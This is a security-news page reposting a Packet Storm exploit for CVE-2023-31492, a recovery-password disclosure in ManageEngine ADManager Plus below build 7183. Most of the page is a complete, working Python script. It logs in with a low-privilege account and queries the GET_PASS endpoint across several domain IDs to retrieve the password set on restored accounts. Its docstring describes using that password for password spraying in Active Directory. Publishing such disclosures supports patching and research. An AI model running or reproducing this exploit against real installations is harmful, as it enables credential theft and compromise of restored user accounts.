Security
Headlines
HeadlinesLatestCVEs

Headline

ManageEngine ADManager Plus Recovery Password Disclosure

ManageEngine ADManager Plus versions prior to build 7183 suffers from a recovery password disclosure vulnerability.

Packet Storm
#vulnerability#windows#git#auth#firefox
# Exploit Title: ManageEngine ADManager Plus Build < 7183 - Recovery Password Disclosure# Exploit Author: Metin Yunus Kandemir# Vendor Homepage: https://www.manageengine.com/# Software Link: https://www.manageengine.com/products/ad-manager/# Details: https://docs.unsafe-inline.com/0day/manageengine-admanager-plus-build-less-than-7183-recovery-password-disclosure-cve-2023-31492# Details: https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/admanager-recovery-password-disclosure.md# Version: ADManager Plus Build < 7183# Tested against: Build 7180# CVE: CVE-2023-31492import argparseimport requestsimport urllib3import sys"""The Recovery Settings helps you configure the restore and recycle options pertaining to the objects in the domain you wish to recover. When deleted user accounts are restored, defined password is set to the user accounts. Helpdesk technician that has not privilege for backup/recovery operations can view the password and then compromise restored user accounts conducting password spraying attack in the Active Directory environment."""urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)def getPass(target, auth, user, password):    with requests.Session() as s:        if auth.lower() == 'admanager':            auth = 'ADManager Plus Authentication'        data = {            "is_admp_pass_encrypted": "false",            "j_username": user,            "j_password": password,            "domainName": auth,            "AUTHRULE_NAME": "ADAuthenticator"        }        # Login        url = target + 'j_security_check?LogoutFromSSO=true'        headers = {            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0",            "Content-Type": "application/x-www-form-urlencoded"        }        req = s.post(url, data=data, headers=headers, allow_redirects=True, verify=False)        if 'Cookie' in req.request.headers:            print('[+] Authentication successful!')        elif req.status_code == 200:            print('[-] Invalid login name/password!')            sys.exit(0)        else:            print('[-] Something went wrong!')            sys.exit(1)        # Fetching recovery password        for i in range(1, 6):            print('[*] Trying to fetch recovery password for domainId: %s !' % i)            passUrl = target + 'ConfigureRecoverySettings/GET_PASS?req=%7B%22domainId%22%3A%22' + str(i) + '%22%7D'            passReq = s.get(passUrl, headers=headers, allow_redirects=False, verify=False)            if passReq.content:                print(passReq.content)def main():    arg = get_args()    target = arg.target    auth = arg.auth    user = arg.user    password = arg.password    getPass(target, auth, user, password)def get_args():    parser = argparse.ArgumentParser(        epilog="Example: exploit.py -t https://target/ -a unsafe.local -u operator1 -p operator1")    parser.add_argument('-t', '--target', required=True, action='store', help='Target url')    parser.add_argument('-a', '--auth', required=True, action='store',                        help='If you have credentials of the application user, type admanager. If you have credentials of the domain user, type domain DNS name of the target domain.')    parser.add_argument('-u', '--user', required=True, action='store')    parser.add_argument('-p', '--password', required=True, action='store')    args = parser.parse_args()    return argsmain()

Related news

CVE-2023-31492: vulnerability-research/manage-engine-apps/admanager-recovery-password-disclosure.md at main · passtheticket/vulnerability-research

Incorrect access control in Zoho ManageEngine ADManager Plus Build 7180 allows unauthenticated attackers to view user passwords after executing backup or recovery operations on user accounts.

Packet Storm: Latest News

Ubuntu Security Notice USN-7121-3